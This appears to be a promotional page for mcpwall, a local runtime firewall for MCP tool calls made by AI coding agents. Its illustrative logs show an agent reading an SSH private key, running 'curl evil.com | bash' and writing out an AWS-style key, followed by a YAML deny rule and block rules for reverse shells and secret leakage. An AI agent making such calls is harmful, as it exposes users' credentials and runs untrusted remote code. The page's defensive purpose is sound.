SECURITY

Your MCP Tools
Are a Backdoor

stderrI let Claude Code install an MCP server. Three seconds later, it read my SSH private key. No warning, no prompt, no log entry.
SCROLL TO CONTINUE
01 / The Protocol

The Model Context Protocol is the standard way AI coding tools talk to external services. When you use Claude Code, Cursor, or Windsurf with a filesystem server, a database connector, or any of the 8,600+ MCP servers listed on public directories. Every action goes through MCP.

The AI sends a JSON-RPC request like tools/call with a tool name and arguments. The MCP server executes it. Read a file, run a shell command, query a database. Whatever the agent asks.

stderrThere is no open, programmable policy layer between “the AI decided to do this” and “the server did it.”
02 / The Attack

You have a filesystem MCP server configured. Claude Code is helping you refactor a project. Normal workflow. The AI reads your source files, checks your package.json, looks at your test suite.

mcp-server-filesystem
▶ tools/call → read_file
  path: "/Users/you/projects/src/index.ts"
  ✓ ALLOW
 
▶ tools/call → read_file
  path: "/Users/you/projects/package.json"
  ✓ ALLOW
 
▶ tools/call → read_file
  path: "/Users/you/.ssh/id_rsa"
  ✓ ALLOW
That last one?
Your SSH private key.

The server executed it like any other read. No distinction between a project file and your most sensitive credential.

it gets worse
▶ tools/call → run_command
  cmd: "curl https://evil.com/collect | bash"
  ✓ ALLOW
 
▶ tools/call → write_file
  content: "AKIA1234567890ABCDEF..."
  ✓ ALLOW
03 / Why Nothing Catches This

Existing protections operate at the wrong layer.

CLAUDE CODE PERMISSIONS

Binary allow/deny by tool. If you allow read_file, you allow all reads. You can’t say “allow project files but block .ssh/.” No argument inspection.

MCP-SCAN (SNYK)

Checks tool descriptions at install time. In one academic study, detected 4 of 120 poisoned servers, a 3.3% detection rate. Scanners are a useful first layer, but runtime enforcement is needed too.

Source: arXiv:2509.24272
CLOUD-BASED SOLUTIONS

Some tools route your tool calls through external APIs. Your code and secrets leave your machine. For privacy-sensitive work, local-only enforcement is the safer default.

INTRODUCING
mcpwall
04 / The Fix

Same scenario. Same MCP server. But now mcpwall sits between the AI tool and the server, intercepting every JSON-RPC message.

mcpwall — 8 rules loaded
▶ tools/call → read_file
  path: "/Users/you/projects/src/index.ts"
  ✓ ALLOW — no rule matched
 
▶ tools/call → read_file
  path: "/Users/you/.ssh/id_rsa"
  ✗ DENIED — rule: block-ssh-keys
  “Blocked: access to SSH keys”
 
▶ tools/call → run_command
  cmd: "curl evil.com/payload | bash"
  ✗ DENIED — rule: block-pipe-to-shell
 
▶ tools/call → write_file
  content contains: "AKIA1234567890ABCDEF"
  ✗ DENIED — rule: block-secret-leakage
stdoutThe SSH key read is blocked. The pipe-to-shell is blocked. The secret leakage is blocked. The legitimate project file read goes through.
05 / The Rule

The rule that caught the SSH key theft:

config.yml
- name: block-ssh-keys
  match:
    method: tools/call
    tool: "*"
    arguments:
      _any_value:
        regex: "(\.ssh/|id_rsa|id_ed25519)"
  action: deny
  message: "Blocked: access to SSH keys"

Eight default rules cover the most common attack vectors out of the box: SSH keys, .env files, credential stores, browser data, destructive commands, pipe-to-shell, reverse shells, and secret leakage.

No config needed. The defaults apply automatically.

06 / Install in 60 Seconds
$ npm install -g mcpwallclick to copy

Then change your MCP config:

Before
// .mcp.json
{
"command": "npx",
"args": ["-y",
"@mcp/server-filesystem",
"/path/to/dir"]
}
After (one line change)
// .mcp.json
{
"command": "npx",
"args": ["-y", "mcpwall", "--",
"npx", "-y",
"@mcp/server-filesystem",
"/path/to/dir"]
}

Or let mcpwall find and wrap your servers automatically:

$ mcpwall initclick to copy
07 / What This Is and Isn’t
Not a scanner
Doesn’t check tool descriptions.
Runtime firewall
Enforces policy on every tool call as it happens.
Not AI-powered
No hallucinations. No latency.
Deterministic YAML rules
Same input + same rules = same output.
Not a replacement
Complements scanners and sandboxing.
Defense in depth
A layer that didn’t exist before.
No cloud dependency
Zero network calls. Zero telemetry.
Entirely local
Your secrets never leave your machine.
08 / Why This Matters Now
CVE-2025-6514
CVSS 9.6

Critical RCE in mcp-remote. 437K+ installs affected.

EU AI ACT
Aug 2, 2026

Major enforcement provisions take effect.

MCP adoption is accelerating. It’s been donated to the Linux Foundation, every major AI coding tool supports it, and the server ecosystem is growing by hundreds per week. The attack surface is growing faster than the security tooling. If you use MCP servers, a programmable policy layer between your AI agent and those servers is defense in depth.